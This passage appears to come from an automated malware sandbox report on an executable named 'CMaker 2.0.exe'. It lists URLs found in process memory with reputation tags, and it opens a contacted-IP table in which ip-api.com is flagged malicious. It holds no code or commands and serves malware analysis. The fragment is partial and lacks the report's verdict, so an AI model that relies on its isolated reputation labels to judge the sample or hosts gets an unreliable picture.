                                                                                        http://crl.securetrust.com/STCA.crlCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://wwwsearch.sf.net/):CMaker 2.0.exe, 00000005.00000003.2228708764.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2233681929.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228000312.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235010705.0000022D34E20000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34E1B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232397966.0000022D34E16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.accv.es/legislacion_c.htmCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245266079.0000022D352CF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259518979.0000022D352CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://tools.ietf.org/html/rfc6125#section-6.4.3CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://cryptography.io/en/latest/security/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://crl.xrampsecurity.com/XGCA.crl0CMaker 2.0.exe, 00000005.00000003.2225705918.0000022D35166000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2218109441.0000022D35166000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.cert.fnmt.es/dpcs/CMaker 2.0.exe, 00000005.00000003.2227719395.0000022D35311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://google.com/mailCMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://dashboard.botghost.com/api/public/tools/user_lookup/10773009346920490670DCMaker 2.0.exe, 00000005.00000002.2260388566.0000022D35834000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.accv.es00CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245266079.0000022D352CF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259518979.0000022D352CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyCMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmCMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://github.com/pyca/cryptography/issuesCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://readthedocs.org/projects/cryptography/badge/?version=latestCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://foss.heptapod.net/pypy/pypy/-/issues/3539CMaker 2.0.exe, 00000005.00000003.2176043917.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257904597.0000022D34F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236209518.0000022D34CCA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://google.com/CMaker 2.0.exe, 00000005.00000003.2234513191.0000022D34AA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232148885.0000022D34A94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://mahler:8092/site-updates.pyCMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176670133.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229450636.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34D64000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://crl.securetrust.com/SGCA.crlCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://.../back.jpegCMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://github.com/pyca/cryptographyCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://www.python.org/download/releases/2.3/mro/.CMaker 2.0.exe, 00000005.00000002.2256074496.0000022D34600000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168528887.0000022D34B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://cryptography.io/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://httpbin.org/postCMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://crl.d-CMaker 2.0.exe, 00000005.00000002.2259602397.0000022D35306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://github.com/pyca/cryptography/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://github.com/Ousret/charset_normalizerCMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176104183.0000022D3514D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236511528.0000022D35151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.firmaprofesional.com/cps0CMaker 2.0.exe, 00000005.00000002.2256390299.0000022D34A4C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244995687.0000022D34A4B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229615812.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234727388.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://github.com/urllib3/urllib3/issues/2920CMaker 2.0.exe, 00000005.00000002.2259985977.0000022D35440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://crl.securetrust.com/SGCA.crl0CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226605077.0000022D352B9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://yahoo.com/CMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://crl.securetrust.com/STCA.crl0CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235901108.0000022D35114000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://www.quovadisglobal.com/cps.=CMaker 2.0.exe, 00000005.00000003.2232058753.0000022D3527F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2242336196.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245417643.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246505041.0000022D35296000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323129454.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471566712.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6CMaker 2.0.exe, 00000005.00000003.2231786991.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236418298.0000022D34C9E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235158831.0000022D34C9C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231226185.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://cacerts.digicert.coCMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://html.spec.whatwg.org/multipage/CMaker 2.0.exe, 00000005.00000003.2236745632.0000022D3511A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235901108.0000022D3511A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234607655.0000022D35118000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.quovadisglobal.com/cps0CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsCMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://cryptography.io/en/latest/changelog/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://contoso.com/powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.iana.org/time-zones/repository/tz-link.htmlCMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172194945.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://mail.python.org/mailman/listinfo/cryptography-devCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://requests.readthedocs.ioCMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://Passport.NET/tbsvchost.exe, 0000001E.00000000.2410640572.0000022E69012000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000014.00000000.2323129454.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471566712.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://repository.swisssign.com/CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228213204.0000022D352A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://crl.xrampsecurity.com/XGCA.crlCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2359290982.000001DE74842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown

                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public IPs

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          208.95.112.1
                                                                                                                                                                          		ip-api.comUnited States
                                                                                                                                                                          		53334TUT-ASUStrue
                                                                                                                                                                          188.114.97.3
                                                                                                                                                                          		dashboard.botghost.comEuropean Union
